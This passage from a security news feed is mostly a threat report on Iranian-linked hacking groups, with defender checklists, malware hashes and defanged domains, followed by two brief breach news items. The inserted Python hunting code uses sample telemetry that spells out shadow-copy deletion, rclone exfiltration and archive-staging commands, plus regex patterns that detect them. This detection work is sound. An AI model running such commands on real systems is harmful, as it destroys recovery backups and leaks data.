Elsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the Middle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious spear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy program at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of her name, “Suzzane Maloney.” In the attacks, the actors started out with a benign email, which eventually led to a subsequent email that contained a malicious link to a remote access tool payload. It is likely these attacks were carried out as a means to perform espionage, more specifically to gather intelligence that could be leveraged for strategic advantage.

These attacks had TTP overlaps with other Iranian-aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming Kitten) but were subsequently attributed to Seedworm.

Other 2025 activity
Camera scanning for intelligence gathering
Marshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is reportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations against countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging data leaks in order to control and shape narratives using wiper and fake ransomware malware.

In June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895 and CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian actors.

In previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing damage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely these attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and potentially enable follow-on targeting of high value targets.

Additionally, in June 2025, a successful password-spraying attack conducted from NordVPN infrastructure against Israeli municipal government entities was reported, followed by spear-phishing attacks that contained links to a ClickFix page designed to trick users into executing malicious PowerShell that ultimately delivered a remote access tool (RAT) through which the attackers can execute arbitrary commands. It is likely the motive behind these attacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the targeting of Israeli entities points to an Iranian actor as the most likely perpetrator.

DieNet DDoS attacks
DieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its intention to target “outlaw sites and corrupt government platforms” using DDoS attacks.

Following the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility for multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government, transit and communication systems.

In its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure, including TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website defacements and data breaches.

Based on reporting, its motives were likely political retaliation and service disruption.

What can we expect next?
Given Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns combining high-visibility disruption for political signaling and lower-visibility access operations for strategic leverage.

Defenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting government, transportation, energy and defense contractors to amplify psychological and economic pressure.

It is also likely that more capable state-aligned groups will continue credential harvesting operations, along with vulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while also positioning themselves for potential future destructive, espionage or coercive operations.

DDoS and defacements
Given the increase in "hacktivist" activity, we predict a surge in DDoS and defacements for fast signaling and media impact, similar to what has been observed recently with Handala’s claims of targeting critical national infrastructure (CNI).

It is likely such attacks would target a range of sectors, including government portals, municipal sites, airports/ports, logistics providers, banks, telcos, media and symbolic brands.

Password spraying and mailbox compromises
Over the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and mailbox compromises as a means of initial access and intelligence gathering.

Targets could include defense organizations, government, contractors and NGOs. Additionally, adjacent organizations that support base operations, including fuel, catering, logistics, and communications could also be targets of these attacks.

Leaks / intimidation operations / psyops
Hacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only partial - this is key escalation behavior.

Potential targets of these kinds of attacks and claims would likely include healthcare, local government, airports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media.

Critical infrastructure and opportunistic attacks
Given the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as organizations supporting these entities.

Organizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as well as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high risk, other organizations that operate within sectors such as energy/fuel supply chains may be targets.

Destructive attacks
Iran has previously exhibited high capabilities in destructive potential, particularly during escalation windows.

Any attacks would likely be focused on energy and utilities, transportation and logistics, the financial sector, telecoms, healthcare, defense contractors and military suppliers.

How can defenders prepare?
Organizations should prepare by focusing on strengthening monitoring capabilities and ensuring resilience across their infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and reconnaissance activity often give defenders an opportunity to detect intrusion attempts early in the attack chain.

DDoS and defacement campaigns
Due to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt public-facing services and monitor any internet-facing infrastructure for the following:

Spikes in HTTP requests from large, distributed IP ranges
Repeated probing of admin portals
Exploit attempts targeting web frameworks and content management systems
Scanning activity against exposed API endpoints
To prepare, organizations should look at performing the following:

Deploy web application firewalls (WAF) with updated rule sets
Enable DDoS protection via CDN or upstream filtering services
Decommission any non-essential or unused publicly accessible services
Ensure all up-to-date patches for web applications/plugins are applied regularly
Ensure website backups exist for rapid restoration, if required
Monitor underground forums, Telegram channels and social media for claims involving your organization
Credential attacks
Credential attacks are one of the most common initial access techniques used by Iranian-linked groups, which include attack attempts against multiple public-facing services.

Defenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts, such as the following:

Repeated login failure attempts across multiple users
Authentication attempts from unusual geographic locations
MFA fatigue attacks
Login attempts occurring outside of normal working hours
Vulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure
Deployment of web shells on internet-facing servers
Credential harvesting through phishing campaigns
Organizations should review and harden any identity security mechanisms by performing the following:

Enable multi-factor authentication for all remote access
Disable legacy authentication protocols
Implement conditional access policies based on location and device risk
Restrict admin logins to specific locations, where possible
Monitor identity provider logs for any anomalies
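Detection logic for two of the patterns listed above, password spraying and MFA fatigue, run over constructed authentication events; this is an added example, not code from the Security.com article. The event format, the ten-minute window and the thresholds (five accounts, two guesses per account, five push prompts) are assumptions to be tuned to the identity provider's logs.

```javascript
// Added example: detection logic for password spraying and MFA fatigue over
// constructed authentication events. Event format, thresholds and windows are
// assumptions; map your identity provider's log fields onto parseEvent().

// Constructed sample events: "<ISO timestamp> <source IP> <user> <type> <outcome>".
const SAMPLE_EVENTS = [
  // One source, one failure each against many accounts in under a minute.
  '2026-03-05T02:01:10Z 203.0.113.7 alice password failure',
  '2026-03-05T02:01:15Z 203.0.113.7 bob password failure',
  '2026-03-05T02:01:21Z 203.0.113.7 carol password failure',
  '2026-03-05T02:01:27Z 203.0.113.7 dave password failure',
  '2026-03-05T02:01:33Z 203.0.113.7 erin password failure',
  '2026-03-05T02:01:40Z 203.0.113.7 frank password failure',
  '2026-03-05T02:02:02Z 203.0.113.7 frank password success',
  // One user mistyping a password: a lockout candidate, not a spray.
  '2026-03-05T09:10:00Z 198.51.100.4 alice password failure',
  '2026-03-05T09:10:08Z 198.51.100.4 alice password failure',
  '2026-03-05T09:10:20Z 198.51.100.4 alice password success',
  // Repeated push prompts to one user until one is approved.
  '2026-03-05T03:00:00Z 203.0.113.9 dave mfa_push denied',
  '2026-03-05T03:00:30Z 203.0.113.9 dave mfa_push denied',
  '2026-03-05T03:01:00Z 203.0.113.9 dave mfa_push denied',
  '2026-03-05T03:01:30Z 203.0.113.9 dave mfa_push denied',
  '2026-03-05T03:02:00Z 203.0.113.9 dave mfa_push denied',
  '2026-03-05T03:02:30Z 203.0.113.9 dave mfa_push approved',
];

function parseEvent(line) {
  const [ts, ip, user, type, outcome] = line.trim().split(/\s+/);
  return { t: Date.parse(ts), ip, user, type, outcome };
}

function groupBy(events, key) {
  const groups = new Map();
  for (const e of events) {
    if (!groups.has(e[key])) groups.set(e[key], []);
    groups.get(e[key]).push(e);
  }
  return groups;
}

// Password spraying: failed password logins from one source against at least
// minUsers distinct accounts inside windowMs, with no account tried more than
// maxPerUser times (few guesses per user, many users, to stay under lockout).
function detectPasswordSpray(lines, { windowMs = 10 * 60 * 1000, minUsers = 5, maxPerUser = 2 } = {}) {
  const failures = lines.map(parseEvent)
    .filter(e => e.type === 'password' && e.outcome === 'failure')
    .sort((a, b) => a.t - b.t);
  const alerts = [];
  for (const [ip, evs] of groupBy(failures, 'ip')) {
    let start = 0;
    for (let end = 0; end < evs.length; end++) {
      while (evs[end].t - evs[start].t > windowMs) start++;
      const perUser = new Map();
      for (let i = start; i <= end; i++) {
        perUser.set(evs[i].user, (perUser.get(evs[i].user) || 0) + 1);
      }
      if (perUser.size >= minUsers && [...perUser.values()].every(c => c <= maxPerUser)) {
        alerts.push({ ip, users: [...perUser.keys()], from: evs[start].t, to: evs[end].t });
        break; // one alert per source is enough for triage
      }
    }
  }
  return alerts;
}

// MFA fatigue: minPrompts or more push prompts to one user inside windowMs.
// An approval inside that burst is the signal that the user gave in.
function detectMfaFatigue(lines, { windowMs = 10 * 60 * 1000, minPrompts = 5 } = {}) {
  const pushes = lines.map(parseEvent)
    .filter(e => e.type === 'mfa_push')
    .sort((a, b) => a.t - b.t);
  const alerts = [];
  for (const [user, evs] of groupBy(pushes, 'user')) {
    let alert = null;
    let start = 0;
    for (let end = 0; end < evs.length; end++) {
      while (evs[end].t - evs[start].t > windowMs) start++;
      const size = end - start + 1;
      if (size >= minPrompts) {
        alert = alert || { user, prompts: 0, approved: false };
        alert.prompts = Math.max(alert.prompts, size);
        alert.approved = alert.approved || evs.slice(start, end + 1).some(e => e.outcome === 'approved');
      }
    }
    if (alert) alerts.push(alert);
  }
  return alerts;
}

console.log(detectPasswordSpray(SAMPLE_EVENTS));
console.log(detectMfaFatigue(SAMPLE_EVENTS));
```

An approved push inside a fatigue burst should be treated as a probable account compromise, not just an alert: revoke the session and reset the factor before investigating further.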
Leak campaigns and intimidation operations
Hacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological pressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators of data staging or exfiltration, such as the following:

Unusual downloads from email systems
Unusual access to document repositories
Suspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple file types
Large outbound data transfers to external cloud storage platforms
Unexpected use of data-transfer applications (e.g. Rclone) in their environment
Organizations should ensure the following monitoring and controls are in place:

Monitoring of large outbound data transfers
Data loss prevention (DLP) policies
Restrictions on access to external cloud storage platforms
Auditing of email and file access
Having a communications plan for potential leak claims can also help organizations respond quickly to these threats.

Attacks on critical infrastructure
Critical infrastructure organizations and companies that support military logistics may face attacks that attempt to compromise the following:

Operational Technology (OT) interfaces
Scheduling and logistics systems
Contractor networks
Remote management systems
Security teams should ensure adequate monitoring is in place for:

Abnormal access to ICS
Unexpected remote connections to operational networks
Authentication attempts targeting infrastructure management systems
Unusual configuration changes in critical systems
Vendor access and contractor networks
Organizations facing these attacks should, at a minimum, ensure that:

Operational technology networks are segmented from other networks
Remote access to infrastructure systems is restricted
Contractor VPN access is monitored
Offline backups of configuration for critical systems are maintained
Destructive attacks
Iran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which targeted Saudi Arabia's oil industry to wipe thousands of systems.

Organizations that anticipate such attacks should ensure they monitor for indicators that attackers may be preparing for a destructive operation such as:

Mass scheduled task creation
Attempts to disable security applications
Deletion of shadow copies or backup data
Unusual administrative commands executed across multiple hosts
Organizations should prioritize resilience against destructive attacks by conducting the following tasks:

Isolating backup infrastructure from production networks
Enabling immutable backups
Testing disaster recovery procedures regularly
Ensuring systems can be restored quickly is critical to recovering from the impact of destructive attacks.
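The staging indicators listed in the leak-campaign section and the preparation indicators listed here can both be hunted in process-creation telemetry. The following is an added Python example, not code from the Symantec report: it runs over constructed sample events (an assumed pipe-separated format with invented host and user names) and flags archive creation that collects several file types, Rclone invocations, scheduled-task creation fanning out across many hosts within minutes, the same command line pushed to many hosts by one account, and shadow copy deletion.

```python
"""Hunt constructed Windows process-creation telemetry for data staging and for signs
that a destructive operation is being prepared. Added example: the event format and the
host and user names are assumptions; thresholds are illustrative."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample telemetry (not real data). Fields: timestamp|host|user|command line
SAMPLE_EVENTS = """\
2026-03-02T09:00:00Z|ws-042|CORP\\jsmith|schtasks.exe /create /tn Sync /tr C:\\Tools\\sync.exe /sc daily
2026-03-02T21:40:00Z|srv-01|CORP\\svc_backup|rar.exe a -r C:\\tmp\\hr.rar D:\\Shares\\HR\\*.docx D:\\Shares\\HR\\*.xlsx D:\\Shares\\HR\\*.pdf
2026-03-02T21:50:00Z|srv-01|CORP\\svc_backup|rclone.exe copy C:\\tmp\\hr.rar remote:staging --transfers 8
2026-03-02T22:01:00Z|srv-01|CORP\\svc_backup|schtasks.exe /create /tn Updater /tr C:\\tmp\\run.bat /sc once /st 23:00
2026-03-02T22:01:05Z|srv-02|CORP\\svc_backup|schtasks.exe /create /tn Updater /tr C:\\tmp\\run.bat /sc once /st 23:00
2026-03-02T22:01:09Z|srv-03|CORP\\svc_backup|schtasks.exe /create /tn Updater /tr C:\\tmp\\run.bat /sc once /st 23:00
2026-03-02T22:01:14Z|ws-117|CORP\\svc_backup|schtasks.exe /create /tn Updater /tr C:\\tmp\\run.bat /sc once /st 23:00
2026-03-02T22:03:00Z|srv-01|CORP\\svc_backup|vssadmin.exe delete shadows /all /quiet
2026-03-02T22:03:02Z|srv-02|CORP\\svc_backup|wmic shadowcopy delete
"""

SHADOW_COPY = re.compile(r"(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)", re.I)
TASK_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create\b", re.I)
ARCHIVE_TOOL = re.compile(r"(?:rar|winrar|7z)(?:\.exe)?\s+a\b", re.I)
RCLONE = re.compile(r"rclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)
FANOUT_HOSTS, FANOUT_WINDOW = 3, timedelta(minutes=15)  # hosts touched by one user per window
MIN_FILE_TYPES = 3                                      # distinct extensions in one archive job


def parse(text):
    """Turn the pipe-separated sample lines into event dicts."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, host, user, cmd = line.split("|", 3)
            events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                           "host": host, "user": user, "cmd": cmd})
    return events


def fan_out(events, predicate, min_hosts=FANOUT_HOSTS, window=FANOUT_WINDOW):
    """One user running matching commands on at least min_hosts distinct hosts inside window."""
    by_user = defaultdict(list)
    for e in events:
        if predicate(e):
            by_user[e["user"]].append(e)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = set(), 0
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            hosts = {e["host"] for e in evs[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            alerts.append((user, sorted(best)))
    return alerts


def repeated_admin_commands(events):
    """The same command line pushed to many hosts by one user, whatever the command is."""
    alerts = []
    by_cmd = defaultdict(list)
    for e in events:
        by_cmd[e["cmd"].lower()].append(e)
    for cmd, evs in by_cmd.items():
        for user, hosts in fan_out(evs, lambda e: True):
            alerts.append((user, cmd, hosts))
    return sorted(alerts)


def shadow_copy_deletions(events):
    return sorted({e["host"] for e in events if SHADOW_COPY.match(e["cmd"])})


def staging_activity(events):
    """Archiving several file types at once, or invoking a bulk-transfer tool such as rclone."""
    hits = set()
    for e in events:
        if ARCHIVE_TOOL.match(e["cmd"]):
            exts = set()
            for arg in e["cmd"].split()[1:]:
                m = re.search(r"\.([a-z0-9]{2,4})$", arg.lower())
                if m:
                    exts.add(m.group(1))
            if len(exts) >= MIN_FILE_TYPES:
                hits.add((e["host"], e["user"], "archive"))
        elif RCLONE.match(e["cmd"]):
            hits.add((e["host"], e["user"], "rclone"))
    return sorted(hits)


def hunt(text):
    events = parse(text)
    return {"data_staging": staging_activity(events),
            "mass_task_creation": fan_out(events, lambda e: TASK_CREATE.match(e["cmd"]) is not None),
            "shadow_copy_deletion": shadow_copy_deletions(events),
            "command_fan_out": repeated_admin_commands(events)}
```

The single scheduled task created by the ordinary user on one workstation is not flagged; only the service account that creates the same task on four hosts within fourteen seconds, deletes shadow copies on two of them, and earlier archived and shipped an HR share is. Correlating these per account and time window, as the dictionary returned by hunt() allows, is what separates a maintenance job from staging for a wiper.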

Historical activity
Stuxnet
One of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the Stuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at the Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent days. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one of the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in U.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable.

Stuxnet was among the first known major nation-state cyberattacks to demonstrate hackers’ ability to manipulate and even destroy physical equipment. It was designed to cause the spinning motors at the bottom of Natanz's enrichment centrifuges to shatter. It was first publicly documented by researchers at Symantec in 2010, after the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was only discovered after it had spread to private networks, it is quite possible that cyber operations are currently being leveraged by and against infrastructure that we know nothing about - yet.

Reports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel hackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million of cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a targeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics, journalists, and security researchers (See more in Damselfly profile).

Damselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the networks of significant institutions in other nations for espionage, disruptive or destructive purposes.

Other key actors
Druidfly
Druidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first came to public attention after a July 2022 wiper attack on multiple targets belonging to the government of Albania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident organization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the attack.

In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks in September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland Justice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were responsible for the attacks.

Druidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).

On June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen a Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was probably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s capital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local government operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s official website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the attack.

Case study: Druidfly attacks on Israeli targets

Following the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against multiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to be a hacktivist group sympathetic to the Palestinian cause.

The wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister Benjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the master boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the destruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.

Figure 1: Message in BibiWiper code suggesting that Israel is not a country
Furthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers deployed by Druidfly during attacks against Albania in 2022 and 2023.

Tracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics, techniques, and procedures between these attacks and earlier Druidfly attacks:

Deployment of HTTPSnoop malware prior to wiping, as seen in earlier Druidfly attacks
Use of the remote desktop tools AnyDesk and ScreenConnect
Use of ReGeorg web shells
Damselfly
Damselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014. It was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other countries. While the group is principally known to be involved in intelligence gathering, members of the group are also known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic Revolutionary Guard Corps (IRGC).

In March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale social engineering campaigns. Consistent features of these campaigns included the use of charismatic sock puppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts seeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.

Damselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July 2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January 2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations in Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures themed around the Israel-Hamas conflict to trick targets into downloading malware.

In 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli journalists, cyber security experts and computer science professors from leading Israeli universities with spear phishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access to targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to technology executives or researchers through emails and WhatsApp messages.

Mantis
Active since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23) is an Arabic-speaking group that appears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the government, military, media, financial, research, education, and energy sectors. Most of its attacks have been against organizations in the Middle East, but it has, on occasion, attacked targets outside the region. It has also been known on occasion to target individuals or organizations within Gaza itself. While other vendors have linked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian organization.

The group favors spear-phishing emails with malicious attachments or links to malicious files as its main infection vector. Mantis uses custom malware, and its most recent toolset includes the backdoors Trojan.Micropsia and Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types using WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary payloads for the attackers. Arid Gopher is a modular backdoor written in Go. It appears to be regularly updated and rewritten by the attackers, most likely to evade detection.

These tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian territories. The initial infection vector for this campaign remains unknown, but both the Micropsia and AridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions of the same toolset (that is, different variants of the same tools) on three groups of computers. Compartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered, the attackers would still have a persistent presence on the target’s network.

Indicators of Compromise (IOCs)
0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 - Trojan.Dindoor

1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 - Trojan.Dindoor

2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 - Trojan.Dindoor

2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - Trojan.Dindoor

42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f - Trojan.Dindoor

7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 - Trojan.Dindoor

7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef - Trojan.Dindoor

b0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 - Trojan.Dindoor

bd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a - Trojan.Dindoor

c7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e - Trojan.Dindoor

077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de - Trojan.Fakeset

15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 - Trojan.Fakeset

2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 - Trojan.Fakeset

4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be - Trojan.Fakeset

64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb - Trojan.Fakeset

64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 - Trojan.Fakeset

74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d - Trojan.Fakeset

94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 - Trojan.Fakeset

a4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 - Trojan.Fakeset

a5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c - Trojan.Fakeset

ddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 - Trojan.Fakeset

24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 - Trojan.Stagecomp

a92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 - Trojan.Stagecomp

3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 - Trojan.Darkcomp

1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 - Trojan.Darkcomp

Network Indicators

gitempire.s3.us-east-005.backblazeb2[.]com

elvenforest.s3.us-east-005.backblazeb2[.]com

uppdatefile[.]com

serialmenot[.]com

moonzonet[.]com

security.com EN 2026 muddywater Seedworm US-Iran-War APT
Canadian Tire Data Breach Impacts 38 Million Accounts https://www.securityweek.com/canadian-tire-data-breach-impacts-38-million-accounts/
08/03/2026 11:44:35

securityweek.com
By Ionut Arghire | February 28, 2026 (6:50 AM ET)

More than 38 million accounts were affected by an October 2025 data breach at Canadian retail giant Canadian Tire.

The incident was discovered on October 2 and involved unauthorized access to an e-commerce database, the company said.

“The database contained basic personal information for customers who have an e-commerce account with one or more of Canadian Tire, SportChek, Mark’s/L’Équipeur and Party City,” the retail giant announced in October.

Canadian Tire said at the time that the compromised information included names, email addresses, dates of birth, encrypted passwords, and, in some cases, incomplete credit card numbers.

Fewer than 150,000 accounts had date of birth details compromised, the company said.

Canadian Tire also underlined that the password and credit card information could not be used to access users’ accounts or to perform fraudulent transactions and purchases, and that no Canadian Tire Bank information or Triangle Rewards loyalty data was compromised in the incident.

This week, the data set associated with the incident was added to the data breach notification website Have I Been Pwned.

According to the website, roughly 42 million records were compromised in the attack, including 38.3 million email addresses. In addition to the details shared by Canadian Tire, the leaked compromised data also includes addresses, phone numbers, and gender information.

“Passwords were stored as PBKDF2 hashes, and for a subset of records, dates of birth and partial credit card data were also included (card type, expiry, and masked card number),” Have I Been Pwned notes.

Canadian Tire has notified the affected individuals via email but has yet to publicly confirm the number of victims.

securityweek.com EN 2026 Canada Canadian-Tire dataleak
Madison Square Garden Data Breach Confirmed Months After Hacker Attack https://www.securityweek.com/madison-square-garden-data-breach-confirmed-months-after-hacker-attack/
08/03/2026 11:42:53

securityweek.com
By Eduard Kovacs | March 2, 2026 (8:53 AM ET)

The company is one of the many victims of the 2025 Oracle E-Business Suite (EBS) hacking campaign.

Madison Square Garden has confirmed being impacted by a data breach stemming from a cybercrime campaign targeting customers of Oracle’s E-Business Suite (EBS) solution.

In the Oracle EBS hacking campaign, the Cl0p ransomware and extortion group exploited zero-day vulnerabilities to gain access to data stored by more than 100 organizations in the enterprise management software.

Madison Square Garden (MSG), the world-famous arena located in New York City, was named by the hackers as a victim of the campaign in November 2025.

Data allegedly stolen from the company — more than 210GB of archive files — was leaked by the cybercriminals soon after, indicating that it had refused to pay a ransom.

MSG did not respond to repeated requests for comment at the time. However, it has now confirmed suffering a data breach and it has started notifying individuals whose personal information was compromised as a result of the cybersecurity incident.

According to notifications from MSG Entertainment, the impacted Oracle EBS instance is hosted and managed by a third-party vendor, whose investigation found that hackers stole data in August 2025.

The entertainment company said personal information, including names and SSNs, was compromised.

It’s unclear how many people are affected in total, but MSG Entertainment told the Maine Attorney General’s Office that 11 of the state’s residents are impacted.

securityweek.com EN 2026 Oracle-E-Business-Suite EBS MSG Madison-Square-Garden Cl0p ransomware